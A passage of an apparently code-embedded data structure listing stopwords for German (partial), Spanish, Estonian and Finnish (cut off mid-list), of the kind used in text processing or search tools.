\"o\",\n        \"ob\",\n        \"oben\",\n        \"oder\",\n        \"offen\",\n        \"oft\",\n        \"ohne\",\n        \"p\",\n        \"q\",\n        \"r\",\n        \"recht\",\n        \"rechte\",\n        \"rechten\",\n        \"rechter\",\n        \"rechtes\",\n        \"richtig\",\n        \"rund\",\n        \"s\",\n        \"sa\",\n        \"sache\",\n        \"sagt\",\n        \"sagte\",\n        \"sah\",\n        \"satt\",\n        \"schlecht\",\n        \"schon\",\n        \"sechs\",\n        \"sechste\",\n        \"sechsten\",\n        \"sechster\",\n        \"sechstes\",\n        \"sehr\",\n        \"sei\",\n        \"seid\",\n        \"seien\",\n        \"sein\",\n        \"seine\",\n        \"seinem\",\n        \"seinen\",\n        \"seiner\",\n        \"seines\",\n        \"seit\",\n        \"seitdem\",\n        \"selbst\",\n        \"sich\",\n        \"sie\",\n        \"sieben\",\n        \"siebente\",\n        \"siebenten\",\n        \"siebenter\",\n        \"siebentes\",\n        \"sind\",\n        \"so\",\n        \"solang\",\n        \"solche\",\n        \"solchem\",\n        \"solchen\",\n        \"solcher\",\n        \"solches\",\n        \"soll\",\n        \"sollen\",\n        \"sollst\",\n        \"sollt\",\n        \"sollte\",\n        \"sollten\",\n        \"sondern\",\n        \"sonst\",\n        \"soweit\",\n        \"sowie\",\n        \"später\",\n        \"startseite\",\n        \"statt\",\n        \"steht\",\n        \"suche\",\n        \"t\",\n        \"tag\",\n        \"tage\",\n        \"tagen\",\n        \"tat\",\n        \"teil\",\n        \"tel\",\n        \"tritt\",\n        \"trotzdem\",\n        \"tun\",\n        \"u\",\n        \"uhr\",\n        \"um\",\n        \"und\",\n        \"und?\",\n        \"uns\",\n        \"unser\",\n        \"unsere\",\n        \"unserer\",\n        \"unter\",\n        \"v\",\n        \"vergangenen\",\n        \"viel\",\n        \"viele\",\n        \"vielem\",\n        \"vielen\",\n        \"vielleicht\",\n        \"vier\",\n        \"vierte\",\n        \"vierten\",\n        \"vierter\",\n        \"viertes\",\n        \"vom\",\n        \"von\",\n        \"vor\",\n        \"w\",\n        \"wahr?\",\n        \"wann\",\n        \"war\",\n        \"waren\",\n        \"wart\",\n        \"warum\",\n        \"was\",\n        \"wegen\",\n        \"weil\",\n        \"weit\",\n        \"weiter\",\n        \"weitere\",\n        \"weiteren\",\n        \"weiteres\",\n        \"welche\",\n        \"welchem\",\n        \"welchen\",\n        \"welcher\",\n        \"welches\",\n        \"wem\",\n        \"wen\",\n        \"wenig\",\n        \"wenige\",\n        \"weniger\",\n        \"weniges\",\n        \"wenigstens\",\n        \"wenn\",\n        \"wer\",\n        \"werde\",\n        \"werden\",\n        \"werdet\",\n        \"weshalb\",\n        \"wessen\",\n        \"wie\",\n        \"wieder\",\n        \"wieso\",\n        \"will\",\n        \"willst\",\n        \"wir\",\n        \"wird\",\n        \"wirklich\",\n        \"wirst\",\n        \"wissen\",\n        \"wo\",\n        \"wohl\",\n        \"wollen\",\n        \"wollt\",\n        \"wollte\",\n        \"wollten\",\n        \"worden\",\n        \"wurde\",\n        \"wurden\",\n        \"während\",\n        \"währenddem\",\n        \"währenddessen\",\n        \"wäre\",\n        \"würde\",\n        \"würden\",\n        \"x\",\n        \"y\",\n        \"z\",\n        \"z.b\",\n        \"zehn\",\n        \"zehnte\",\n        \"zehnten\",\n        \"zehnter\",\n        \"zehntes\",\n        \"zeit\",\n        \"zu\",\n        \"zuerst\",\n        \"zugleich\",\n        \"zum\",\n        \"zunächst\",\n        \"zur\",\n        \"zurück\",\n        \"zusammen\",\n        \"zwanzig\",\n        \"zwar\",\n        \"zwei\",\n        \"zweite\",\n        \"zweiten\",\n        \"zweiter\",\n        \"zweites\",\n        \"zwischen\",\n        \"zwölf\",\n        \"über\",\n        \"überhaupt\",\n        \"übrigens\",\n    ],\n    \"es\": [\n        \"a\",\n        \"actualmente\",\n        \"acuerdo\",\n        \"adelante\",\n        \"ademas\",\n        \"además\",\n        \"adrede\",\n        \"afirmó\",\n        \"agregó\",\n        \"ahi\",\n        \"ahora\",\n        \"ahí\",\n        \"al\",\n        \"algo\",\n        \"alguna\",\n        \"algunas\",\n        \"alguno\",\n        \"algunos\",\n        \"algún\",\n        \"alli\",\n        \"allí\",\n        \"alrededor\",\n        \"ambos\",\n        \"ampleamos\",\n        \"antano\",\n        \"antaño\",\n        \"ante\",\n        \"anterior\",\n        \"antes\",\n        \"apenas\",\n        \"aproximadamente\",\n        \"aquel\",\n        \"aquella\",\n        \"aquellas\",\n        \"aquello\",\n        \"aquellos\",\n        \"aqui\",\n        \"aquél\",\n        \"aquélla\",\n        \"aquéllas\",\n        \"aquéllos\",\n        \"aquí\",\n        \"arriba\",\n        \"arribaabajo\",\n        \"aseguró\",\n        \"asi\",\n        \"así\",\n        \"atras\",\n        \"aun\",\n        \"aunque\",\n        \"ayer\",\n        \"añadió\",\n        \"aún\",\n        \"b\",\n        \"bajo\",\n        \"bastante\",\n        \"bien\",\n        \"breve\",\n        \"buen\",\n        \"buena\",\n        \"buenas\",\n        \"bueno\",\n        \"buenos\",\n        \"c\",\n        \"cada\",\n        \"casi\",\n        \"cerca\",\n        \"cierta\",\n        \"ciertas\",\n        \"cierto\",\n        \"ciertos\",\n        \"cinco\",\n        \"claro\",\n        \"comentó\",\n        \"como\",\n        \"con\",\n        \"conmigo\",\n        \"conocer\",\n        \"conseguimos\",\n        \"conseguir\",\n        \"considera\",\n        \"consideró\",\n        \"consigo\",\n        \"consigue\",\n        \"consiguen\",\n        \"consigues\",\n        \"contigo\",\n        \"contra\",\n        \"cosas\",\n        \"creo\",\n        \"cual\",\n        \"cuales\",\n        \"cualquier\",\n        \"cuando\",\n        \"cuanta\",\n        \"cuantas\",\n        \"cuanto\",\n        \"cuantos\",\n        \"cuatro\",\n        \"cuenta\",\n        \"cuál\",\n        \"cuáles\",\n        \"cuándo\",\n        \"cuánta\",\n        \"cuántas\",\n        \"cuánto\",\n        \"cuántos\",\n        \"cómo\",\n        \"d\",\n        \"da\",\n        \"dado\",\n        \"dan\",\n        \"dar\",\n        \"de\",\n        \"debajo\",\n        \"debe\",\n        \"deben\",\n        \"debido\",\n        \"decir\",\n        \"dejó\",\n        \"del\",\n        \"delante\",\n        \"demasiado\",\n        \"demás\",\n        \"dentro\",\n        \"deprisa\",\n        \"desde\",\n        \"despacio\",\n        \"despues\",\n        \"después\",\n        \"detras\",\n        \"detrás\",\n        \"dia\",\n        \"dias\",\n        \"dice\",\n        \"dicen\",\n        \"dicho\",\n        \"dieron\",\n        \"diferente\",\n        \"diferentes\",\n        \"dijeron\",\n        \"dijo\",\n        \"dio\",\n        \"donde\",\n        \"dos\",\n        \"durante\",\n        \"día\",\n        \"días\",\n        \"dónde\",\n        \"e\",\n        \"ejemplo\",\n        \"el\",\n        \"ella\",\n        \"ellas\",\n        \"ello\",\n        \"ellos\",\n        \"embargo\",\n        \"empleais\",\n        \"emplean\",\n        \"emplear\",\n        \"empleas\",\n        \"empleo\",\n        \"en\",\n        \"encima\",\n        \"encuentra\",\n        \"enfrente\",\n        \"enseguida\",\n        \"entonces\",\n        \"entre\",\n        \"era\",\n        \"eramos\",\n        \"eran\",\n        \"eras\",\n        \"eres\",\n        \"es\",\n        \"esa\",\n        \"esas\",\n        \"ese\",\n        \"eso\",\n        \"esos\",\n        \"esta\",\n        \"estaba\",\n        \"estaban\",\n        \"estado\",\n        \"estados\",\n        \"estais\",\n        \"estamos\",\n        \"estan\",\n        \"estar\",\n        \"estará\",\n        \"estas\",\n        \"este\",\n        \"esto\",\n        \"estos\",\n        \"estoy\",\n        \"estuvo\",\n        \"está\",\n        \"están\",\n        \"ex\",\n        \"excepto\",\n        \"existe\",\n        \"existen\",\n        \"explicó\",\n        \"expresó\",\n        \"f\",\n        \"fin\",\n        \"final\",\n        \"fue\",\n        \"fuera\",\n        \"fueron\",\n        \"fui\",\n        \"fuimos\",\n        \"g\",\n        \"general\",\n        \"gran\",\n        \"grandes\",\n        \"gueno\",\n        \"h\",\n        \"ha\",\n        \"haber\",\n        \"habia\",\n        \"habla\",\n        \"hablan\",\n        \"habrá\",\n        \"había\",\n        \"habían\",\n        \"hace\",\n        \"haceis\",\n        \"hacemos\",\n        \"hacen\",\n        \"hacer\",\n        \"hacerlo\",\n        \"haces\",\n        \"hacia\",\n        \"haciendo\",\n        \"hago\",\n        \"han\",\n        \"hasta\",\n        \"hay\",\n        \"haya\",\n        \"he\",\n        \"hecho\",\n        \"hemos\",\n        \"hicieron\",\n        \"hizo\",\n        \"horas\",\n        \"hoy\",\n        \"hubo\",\n        \"i\",\n        \"igual\",\n        \"incluso\",\n        \"indicó\",\n        \"informo\",\n        \"informó\",\n        \"intenta\",\n        \"intentais\",\n        \"intentamos\",\n        \"intentan\",\n        \"intentar\",\n        \"intentas\",\n        \"intento\",\n        \"ir\",\n        \"j\",\n        \"junto\",\n        \"k\",\n        \"l\",\n        \"la\",\n        \"lado\",\n        \"largo\",\n        \"las\",\n        \"le\",\n        \"lejos\",\n        \"les\",\n        \"llegó\",\n        \"lleva\",\n        \"llevar\",\n        \"lo\",\n        \"los\",\n        \"luego\",\n        \"lugar\",\n        \"m\",\n        \"mal\",\n        \"manera\",\n        \"manifestó\",\n        \"mas\",\n        \"mayor\",\n        \"me\",\n        \"mediante\",\n        \"medio\",\n        \"mejor\",\n        \"mencionó\",\n        \"menos\",\n        \"menudo\",\n        \"mi\",\n        \"mia\",\n        \"mias\",\n        \"mientras\",\n        \"mio\",\n        \"mios\",\n        \"mis\",\n        \"misma\",\n        \"mismas\",\n        \"mismo\",\n        \"mismos\",\n        \"modo\",\n        \"momento\",\n        \"mucha\",\n        \"muchas\",\n        \"mucho\",\n        \"muchos\",\n        \"muy\",\n        \"más\",\n        \"mí\",\n        \"mía\",\n        \"mías\",\n        \"mío\",\n        \"míos\",\n        \"n\",\n        \"nada\",\n        \"nadie\",\n        \"ni\",\n        \"ninguna\",\n        \"ningunas\",\n        \"ninguno\",\n        \"ningunos\",\n        \"ningún\",\n        \"no\",\n        \"nos\",\n        \"nosotras\",\n        \"nosotros\",\n        \"nuestra\",\n        \"nuestras\",\n        \"nuestro\",\n        \"nuestros\",\n        \"nueva\",\n        \"nuevas\",\n        \"nuevo\",\n        \"nuevos\",\n        \"nunca\",\n        \"o\",\n        \"ocho\",\n        \"os\",\n        \"otra\",\n        \"otras\",\n        \"otro\",\n        \"otros\",\n        \"p\",\n        \"pais\",\n        \"para\",\n        \"parece\",\n        \"parte\",\n        \"partir\",\n        \"pasada\",\n        \"pasado\",\n        \"paìs\",\n        \"peor\",\n        \"pero\",\n        \"pesar\",\n        \"poca\",\n        \"pocas\",\n        \"poco\",\n        \"pocos\",\n        \"podeis\",\n        \"podemos\",\n        \"poder\",\n        \"podria\",\n        \"podriais\",\n        \"podriamos\",\n        \"podrian\",\n        \"podrias\",\n        \"podrá\",\n        \"podrán\",\n        \"podría\",\n        \"podrían\",\n        \"poner\",\n        \"por\",\n        \"porque\",\n        \"posible\",\n        \"primer\",\n        \"primera\",\n        \"primero\",\n        \"primeros\",\n        \"principalmente\",\n        \"pronto\",\n        \"propia\",\n        \"propias\",\n        \"propio\",\n        \"propios\",\n        \"proximo\",\n        \"próximo\",\n        \"próximos\",\n        \"pudo\",\n        \"pueda\",\n        \"puede\",\n        \"pueden\",\n        \"puedo\",\n        \"pues\",\n        \"q\",\n        \"qeu\",\n        \"que\",\n        \"quedó\",\n        \"queremos\",\n        \"quien\",\n        \"quienes\",\n        \"quiere\",\n        \"quiza\",\n        \"quizas\",\n        \"quizá\",\n        \"quizás\",\n        \"quién\",\n        \"quiénes\",\n        \"qué\",\n        \"r\",\n        \"raras\",\n        \"realizado\",\n        \"realizar\",\n        \"realizó\",\n        \"repente\",\n        \"respecto\",\n        \"s\",\n        \"sabe\",\n        \"sabeis\",\n        \"sabemos\",\n        \"saben\",\n        \"saber\",\n        \"sabes\",\n        \"salvo\",\n        \"se\",\n        \"sea\",\n        \"sean\",\n        \"segun\",\n        \"segunda\",\n        \"segundo\",\n        \"según\",\n        \"seis\",\n        \"ser\",\n        \"sera\",\n        \"será\",\n        \"serán\",\n        \"sería\",\n        \"señaló\",\n        \"si\",\n        \"sido\",\n        \"siempre\",\n        \"siendo\",\n        \"siete\",\n        \"sigue\",\n        \"siguiente\",\n        \"sin\",\n        \"sino\",\n        \"sobre\",\n        \"sois\",\n        \"sola\",\n        \"solamente\",\n        \"solas\",\n        \"solo\",\n        \"solos\",\n        \"somos\",\n        \"son\",\n        \"soy\",\n        \"soyos\",\n        \"su\",\n        \"supuesto\",\n        \"sus\",\n        \"suya\",\n        \"suyas\",\n        \"suyo\",\n        \"sé\",\n        \"sí\",\n        \"sólo\",\n        \"t\",\n        \"tal\",\n        \"tambien\",\n        \"también\",\n        \"tampoco\",\n        \"tan\",\n        \"tanto\",\n        \"tarde\",\n        \"te\",\n        \"temprano\",\n        \"tendrá\",\n        \"tendrán\",\n        \"teneis\",\n        \"tenemos\",\n        \"tener\",\n        \"tenga\",\n        \"tengo\",\n        \"tenido\",\n        \"tenía\",\n        \"tercera\",\n        \"ti\",\n        \"tiempo\",\n        \"tiene\",\n        \"tienen\",\n        \"toda\",\n        \"todas\",\n        \"todavia\",\n        \"todavía\",\n        \"todo\",\n        \"todos\",\n        \"total\",\n        \"trabaja\",\n        \"trabajais\",\n        \"trabajamos\",\n        \"trabajan\",\n        \"trabajar\",\n        \"trabajas\",\n        \"trabajo\",\n        \"tras\",\n        \"trata\",\n        \"través\",\n        \"tres\",\n        \"tu\",\n        \"tus\",\n        \"tuvo\",\n        \"tuya\",\n        \"tuyas\",\n        \"tuyo\",\n        \"tuyos\",\n        \"tú\",\n        \"u\",\n        \"ultimo\",\n        \"un\",\n        \"una\",\n        \"unas\",\n        \"uno\",\n        \"unos\",\n        \"usa\",\n        \"usais\",\n        \"usamos\",\n        \"usan\",\n        \"usar\",\n        \"usas\",\n        \"uso\",\n        \"usted\",\n        \"ustedes\",\n        \"v\",\n        \"va\",\n        \"vais\",\n        \"valor\",\n        \"vamos\",\n        \"van\",\n        \"varias\",\n        \"varios\",\n        \"vaya\",\n        \"veces\",\n        \"ver\",\n        \"verdad\",\n        \"verdadera\",\n        \"verdadero\",\n        \"vez\",\n        \"vosotras\",\n        \"vosotros\",\n        \"voy\",\n        \"vuestra\",\n        \"vuestras\",\n        \"vuestro\",\n        \"vuestros\",\n        \"w\",\n        \"x\",\n        \"y\",\n        \"ya\",\n        \"yo\",\n        \"z\",\n        \"él\",\n        \"ésa\",\n        \"ésas\",\n        \"ése\",\n        \"ésos\",\n        \"ésta\",\n        \"éstas\",\n        \"éste\",\n        \"éstos\",\n        \"última\",\n        \"últimas\",\n        \"último\",\n        \"últimos\",\n    ],\n    \"et\": [\n        \"aga\",\n        \"ei\",\n        \"et\",\n        \"ja\",\n        \"jah\",\n        \"kas\",\n        \"kui\",\n        \"kõik\",\n        \"ma\",\n        \"me\",\n        \"mida\",\n        \"midagi\",\n        \"mind\",\n        \"minu\",\n        \"mis\",\n        \"mu\",\n        \"mul\",\n        \"mulle\",\n        \"nad\",\n        \"nii\",\n        \"oled\",\n        \"olen\",\n        \"oli\",\n        \"oma\",\n        \"on\",\n        \"pole\",\n        \"sa\",\n        \"seda\",\n        \"see\",\n        \"selle\",\n        \"siin\",\n        \"siis\",\n        \"ta\",\n        \"te\",\n        \"ära\",\n    ],\n    \"fi\": [\n        \"aiemmin\",\n        \"aika\",\n        \"aikaa\",\n        \"aikaan\",\n        \"aikaisemmin\",\n        \"aikaisin\",\n        \"aikajen\",\n        \"aikana\",\n        \"aikoina\",\n        \"aikoo\",\n        \"aikovat\",\n        \"aina\",\n        \"ainakaan\",\n        \"ainakin\",\n        \"ainoa\",\n        \"ainoat\",\n        \"aiomme\",\n        \"aion\",\n        \"aiotte\",\n        \"aist\",\n        \"aivan\",\n        \"ajan\",\n        \"alas\",\n        \"alemmas\",\n        \"alkuisin\",\n        \"alkuun\",\n        \"alla\",\n        \"alle\",\n        \"aloitamme\",\n        \"aloitan\",\n        \"aloitat\",\n        \"aloitatte\",\n        \"aloitattivat\",\n        \"aloitettava\",\n        \"aloitettevaksi\",\n        \"aloitettu\",\n        \"aloitimme\",\n        \"aloitin\",\n        \"aloitit\",\n        \"aloititte\",\n        \"aloittaa\",\n        \"aloittamatta\",\n        \"aloitti\",\n        \"aloittivat\",\n        \"alta\",\n        \"aluksi\",\n        \"alussa\",\n        \"alusta\",\n        \"annettavaksi\",\n        \"annetteva\",\n        \"annettu\",\n        \"ansiosta\",\n        \"antaa\",\n        \"antamatta\",\n        \"antoi\",\n        \"aoua\",\n        \"apu\",\n        \"asia\",\n        \"asiaa\",\n        \"asian\",\n        \"asiasta\",\n        \"asiat\",\n        \"asioiden\",\n        \"asioihin\",\n        \"asioita\",\n        \"asti\",\n        \"avuksi\",\n        \"avulla\",\n        \"avun\",\n        \"avutta\",\n        \"edelle\",\n        \"edelleen\",\n        \"edellä\",\n        \"edeltä\",\n        \"edemmäs\",\n        \"edes\",\n        \"edessä\",\n        \"edestä\",\n        \"ehkä\",\n        \"ei\",\n        \"eikä\",\n        \"eilen\",\n        \"eivät\",\n        \"eli\",\n        \"ellei\",\n        \"elleivät\",\n        \"ellemme\",\n        \"ellen\",\n        \"ellet\",\n        \"ellette\",\n        \"emme\",\n        \"en\",\n        \"enemmän\",\n        \"eniten\",\n        \"ennen\",\n        \"ensi\",\n        \"ensimmäinen\",\n        \"ensimmäiseksi\",\n        \"ensimmäisen\",\n        \"ensimmäisenä\",\n        \"ensimmäiset\",\n        \"ensimmäisiksi\",\n        \"ensimmäisinä\",\n        \"ensimmäisiä\",\n        \"ensimmäistä\",\n        \"ensin\",\n        \"entinen\",\n        \"entisen\",\n        \"entisiä\",\n        \"entisten\",\n        \"entistä\",\n        \"enää\",\n        \"eri\",\n        \"erittäin\",\n        \"erityisesti\",\n        \"eräiden\",\n        \"eräs\",\n        \"eräät\",\n        \"esi\",\n        \"esiin\",\n        \"esillä\",\n        \"esimerkiksi\",\n        \"et\",\n        \"eteen\",\n        \"etenkin\",\n        \"etessa\",\n        \"ette\",\n        \"ettei\",\n        \"että\",\n        \"haikki\",\n        \"halua\",\n        \"haluaa\",\n        \"haluamatta\",\n        \"haluamme\",\n        \"haluan\",\n        \"haluat\",\n        \"haluatte\",\n        \"haluavat\",\n        \"halunnut\",\n        \"halusi\",\n        \"halusimme\",\n        \"halusin\",\n        \"halusit\",\n        \"halusitte\",\n        \"halusivat\",\n        \"halutessa\",\n        \"haluton\",\n        \"he\",\n        \"hei\",\n        \"heidän\",\n        \"heihin\",\n        \"heille\",\n        \"heiltä\",\n        \"heissä\",\n        \"heistä\",\n        \"heitä\",\n        \"helposti\",\n        \"heti\",\n        \"hetkellä\",\n        \"hieman\",\n        \"hitaasti\",\n        \"hoikein\",\n        \"huolimatta\",\n        \"huomenna\",\n        \"hyvien\",\n        \"hyviin\",\n        \"hyviksi\",\n        \"hyville\",\n        \"hyviltä\",\n        \"hyvin\",\n        \"hyvinä\",\n        \"hyvissä\",\n        \"hyvistä\",\n        \"hyviä\",\n        \"hyvä\",\n        \"hyvät\",\n        \"hyvää\",\n        \"hän\",\n        \"häneen\",\n        \"hänelle\",\n        \"hänellä\",\n        \"häneltä\",\n        \"hänen\",\n        \"hänessä\",\n        \"hänestä\",\n        \"hänet\",\n        \"ihan\",\n        \"ilman\",\n        \"ilmeisesti\",\n        \"itse\",\n        \"itsensä\",\n        \"itseään\",\n        \"ja\",\n        \"jo\",\n        \"johon\",\n        \"joiden\",\n        \"joihin\",\n        \"joiksi\",\n        \"joilla\",\n        \"joille\",\n        \"joilta\",\n        \"joissa\",\n        \"joista\",\n        \"joita\",\n        \"joka\",\n        \"jokainen\",\n        \"jokin\",\n        \"joko\",\n        \"joku\",\n        \"jolla\",\n        \"jolle\",\n        \"jolloin\",\n        \"jolta\",\n        \"jompikumpi\",\n        \"jonka\",\n        \"jonkin\",\n        \"jonne\",\n        \"joo\",\n        \"jopa\",\n        \"jos\",\n        \"joskus\",\n        \"jossa\",\n        \"josta\",\n        \"jota\",\n        \"jotain\",\n        \"joten\",\n        \"jotenkin\",\n        \"jotenkuten\",\n        \"jotka\",\n        \"jotta\",\n        \"jouduimme\",\n        \"jouduin\",\n        \"jouduit\",\n        \"jouduitte\",\n        \"joudumme\",\n        \"joudun\",\n        \"joudutte\",\n        \"joukkoon\",\n        \"joukossa\",\n        \"joukosta\",\n        \"joutua\",\n        \"joutui\",\n        \"joutuivat\",\n        \"joutumaan\",\n        \"joutuu\",\n        \"joutuvat\",\n        \"juuri\",\n        \"jälkeen\",\n        \"jälleen\",\n        \"jää\",\n        \"kahdeksan\",\n        \"kahdeksannen\",\n        \"kahdella\",\n        \"kahdelle\",\n        \"kahdelta\",\n        \"kahden\",\n        \"kahdessa\",\n        \"kahdesta\",\n        \"kahta\",\n        \"kahteen\",\n        \"kai\",\n        \"kaiken\",\n        \"kaikille\",\n        \"kaikilta\",\n        \"kaikkea\",\n        \"kaikki\",\n        \"kaikkia\",\n        \"kaikkiaan\",\n        \"kaikkialla\",\n        \"kaikkialle\",\n        \"kaikkialta\",\n        \"kaikkien\",\n        \"kaikkin\",\n        \"kaksi\",\n        \"kannalta\",\n        \"kannattaa\",\n        \"kanssa\",\n        \"kanssaan\",\n        \"kanssamme\",\n        \"kanssani\",\n        \"kanssanne\",\n        \"kanssasi\",\n        \"kauan\",\n        \"kauemmas\",\n        \"kaukana\",\n        \"kautta\",\n        \"kehen\",\n        \"keiden\",\n        \"keihin\",\n        \"keiksi\",\n        \"keille\",\n        \"keillä\",\n        \"keiltä\",\n        \"keinä\",\n        \"keissä\",\n        \"keistä\",\n        \"keitten\",\n        \"keittä\",\n        \"keitä\",\n        \"keneen\",\n        \"keneksi\",\n        \"kenelle\",\n        \"kenellä\",\n        \"keneltä\",\n        \"kenen\",\n        \"kenenä\",\n        \"kenessä\",\n        \"kenestä\",\n        \"kenet\",\n        \"kenettä\",\n        \"kennessästä\",\n        \"kenties\",\n        \"kerran\",\n        \"kerta\",\n        \"kertaa\",\n        \"keskellä\",\n        \"kesken\",\n        \"keskimäärin\",\n        \"ketkä\",\n        \"ketä\",\n        \"kiitos\",\n        \"kohti\",\n        \"koko\",\n        \"kokonaan\",\n        \"kolmas\",\n        \"kolme\",\n        \"kolmen\",\n        \"kolmesti\",\n        \"koska\",\n        \"koskaan\",\n        \"kovin\",\n        \"kuin\",\n        \"kuinka\",\n        \"kuinkan\",\n        \"kuitenkaan\",\n        \"kuitenkin\",\n        \"kuka\",\n        \"kukaan\",\n        \"kukin\",\n        \"kukka\",\n        \"kumpainen\",\n        \"kumpainenkaan\",\n        \"kumpi\",\n        \"kumpikaan\",\n        \"kumpikin\",\n        \"kun\",\n        \"kuten\",\n        \"kuuden\",\n        \"kuusi\",\n        \"kuutta\",\n        \"kylliksi\",\n        \"kyllä\",\n        \"kymmenen\",\n        \"kyse\",\n        \"liian\",\n        \"liki\",\n        \"lisäksi\",\n        \"lisää\",\n        \"lla\",\n        \"luo\",\n        \"luona\",\n        \"lähekkäin\",\n        \"lähelle\",\n        \"lähellä\",\n        \"läheltä\",\n        \"lähemmäs\",\n        \"lähes\",\n        \"lähinnä\",\n        \"lähtien\",\n        \"läpi\",\n        \"mahdollisimman\",\n        \"mahdollista\",\n        \"me\",\n        \"meidän\",\n        \"meille\",\n        \"meillä\",\n        \"melkein\",\n        \"melko\",\n        \"menee\",\n        \"meneet\",\n        \"menemme\",\n        \"menen\",\n        \"menet\",\n        \"menette\",\n        \"menevät\",\n        \"meni\",\n        \"menimme\",\n        \"menin\",\n        \"menit\",\n        \"menivät\",\n        \"mennessä\",\n        \"mennyt\",\n        \"menossa\",\n        \"mihin\",\n        \"mikin\",\n        \"miksi\",\n        \"mikä\",\n        \"mikäli\",\n        \"mikään\",\n        \"milloin\",\n        \"milloinkan\",\n        \"minne\",\n        \"minun\",\n        \"minut\",\n        \"minä\",\n        \"missä\",\n        \"mistä\",\n        \"miten\",\n        \"mitä\",\n        \"mitään\",\n        \"moi\",\n        \"molemmat\",\n        \"mones\",\n        \"monesti\",\n        \"monet\",\n        \"moni\",\n        \"moniaalla\",\n        \"moniaalle\",\n        \"moniaalta\",\n        \"monta\",\n        \"muassa\",\n        \"muiden\",\n        \"muita\",\n        \"muka\",\n        \"mukaan\",\n        \"mukaansa\",\n        \"mukana\",\n        \"mutta\",\n        \"muu\",\n        \"muualla\",\n        \"muualle\",\n        \"muualta\",\n        \"muuanne\",\n        \"muulloin\",\n        \"muun\",\n        \"muut\",\n        \"muuta\",\n        \"muutama\",\n        \"muutaman\",\n        \"muuten\",\n        \"myöhemmin\",\n        \"myös\",\n        \"myöskin\",\n        \"myöskään\",\n        \"myötä\",\n        \"ne\",\n        \"neljä\",\n        \"neljän\",\n        \"neljää\",\n        \"niiden\",\n        \"niin\",\n        \"niistä\",\n        \"niitä\",\n        \"noin\",\n        \"nopeammin\",\n        \"nopeasti\",\n        \"nopeiten\",\n        \"nro\",\n        \"nuo\",\n        \"nyt\",\n        \"näiden\",\n        \"näin\",\n        \"näissä\",\n        \"näissähin\",\n        \"näissälle\",\n        \"näissältä\",\n        \"näissästä\",\n        \"näitä\",\n        \"nämä\",\n        \"ohi\",\n        \"oikea\",\n        \"oikealla\",\n        \"oikein\",\n        \"ole\",\n        \"olemme\",\n        \"olen\",\n        \"olet\",\n        \"olette\",\n        \"oleva\",\n        \"olevan\",\n        \"olevat\",\n        \"oli\",\n        \"olimme\",\n        \"olin\",\n        \"olisi\",\n        \"olisimme\",\n        \"olisin\",\n        \"olisit\",\n        \"olisitte\",\n        \"olisivat\",\n        \"olit\",\n        \"olitte\",\n        \"olivat\",\n        \"olla\",\n        \"olleet\",\n        \"olli\",\n        \"ollut\",\n        \"oma\",\n        \"omaa\",\n        \"omaan\",\n        \"omaksi\",\n        \"omalle\",\n        \"omalta\",\n        \"oman\",\n        \"omassa\",\n        \"omat\",\n        \"omia\",\n        \"omien\",\n        \"omiin\",\n        \"omiksi\",\n        \"omille\",\n        \"omilta\",\n        \"omissa\",\n        \"omista\",\n        \"on\",\n        \"onkin\",\n        \"onko\",\n        \"ovat\",\n        \"paikoittain\",\n        \"paitsi\",\n        \"pakosti\",\n        \"paljon\",\n        \"paremmin\",\n        \"parempi\",\n        \"parhaillaan\",\n        \"parhaiten\",\n        \"perusteella\",\n        \"peräti\",\n        \"pian\",\n        \"pieneen\",\n        \"pieneksi\",\n        \"pienelle\",\n        \"pienellä\",\n        \"pieneltä\",\n        \"pienempi\",\n        \"pienestä\",\n        \"pieni\",\n        \"pienin\",\n        \"puolesta\",\n        \"puolestaan\",\n        \"päälle\",\n        \"runsaasti\",\n        \"saakka\",\n        \"sadam\",\n        \"sama\",\n        \"samaa\",\n        \"samaan\",\n        \"samalla\",\n        \"samallalta\",\n        \"samallassa\",\n        \"samallasta\",\n        \"saman\",\n        \"samat\",\n        \"samoin\",\n        \"sata\",\n        \"sataa\",\n        \"satojen\",\n        \"se\",\n        \"seitsemän\",\n        \"sekä\",\n        \"sen\",\n        \"seuraavat\",\n        \"siellä\",\n        \"sieltä\",\n        \"siihen\",\n        \"siinä\",\n        \"siis\",\n        \"siitä\",\n        \"sijaan\",\n        \"siksi\",\n        \"silloin\",\n        \"sillä\",\n        \"silti\",\n        \"sinne\",\n        \"sinua\",\n        \"sinulle\",\n        \"sinulta\",\n        \"sinun\",\n        \"sinussa\",\n        \"sinusta\",\n        \"sinut\",\n        \"sinä\",\n        \"sisäkkäin\",\n        \"sisällä\",\n        \"siten\",\n        \"sitten\",\n        \"sitä\",\n        \"ssa\",\n        \"sta\",\n        \"suoraan\",\n        \"suuntaan\",\n        \"suuren\",\n        \"suuret\",\n        \"suuri\",\n        \"suuria\",\n        \"suurin\",\n        \"suurten\",\n        \"taa\",\n        \"taas\",\n        \"taemmas\",\n        \"tahansa\",\n        \"tai\",\n        \"takaa\",\n        \"takaisin\",\n        \"takana\",\n        \"takia\",\n        \"tapauksessa\",\n        \"tarpeeksi\",\n        \"tavalla\",\n        \"tavoitteena\",\n        \"te\",\n        \"tietysti\",\n        \"todella\",\n        \"toinen\",\n        \"toisaalla\",\n        \"toisaalle\",\n        \"toisaalta\",\n        \"toiseen\",\n        \"toiseksi\",\n        \"toisella\",\n        \"toiselle\",\n        \"toiselta\",\n        \"toisemme\",\n        \"toisen\",\n        \"toisensa\",\n        \"toisessa\",\n        \"toisesta\",\n        \"toista\",\n        \"toistaiseksi\",\n        \"toki\",\n        \"tosin\",\n        \"tuhannen\",\n        \"tuhat\",\n        \"tule\",\n        \"tulee\",\n        \"tulemme\",\n        \"tulen\",\n        \"tulet\",\n        \"tulette\",\n        \"tulevat\",\n        \"tulimme\",\n        \"tulin\",\n        \"tulisi\",\n        \"tulisimme\",\n        \"tulisin\",\n        \"tulisit\",\n        \"tulisitte\",\n        \"tulisivat\",\n        \"tulit\",\n        \"tulitte\",\n        \"tulivat\",\n        \"tulla\",\n        \"tulleet\",\n        \"tullut\",\n        \"tuntuu\",\n        \"tuo\",\n        \"tuolla\",\n        \"tuolloin\",\n        \"tuolta\",\n        \"tuonne\",\n        \"tuskin\",\n        \"tykö\",\n        \"tähän\",\n        \"tällä\",\n        \"tällöin\",\n        \"tämä\",\n        \"tämän\",\n        \"tänne\",\n        \"tänä\",\n        \"tänään\",\n        \"tässä\",\n        \"tästä\",\n        \"täten\",\n        \"tätä\",\n        \"täysin\",\n        \"täytyvät\",\n        \"täytyy\",\n        \"täällä\",\n        \"täältä\",\n        \"ulkopuolella\",\n        \"usea\",\n        \"useasti\",\n        \"useimmiten\",\n        \"usein\",\n        \"useita\",\n        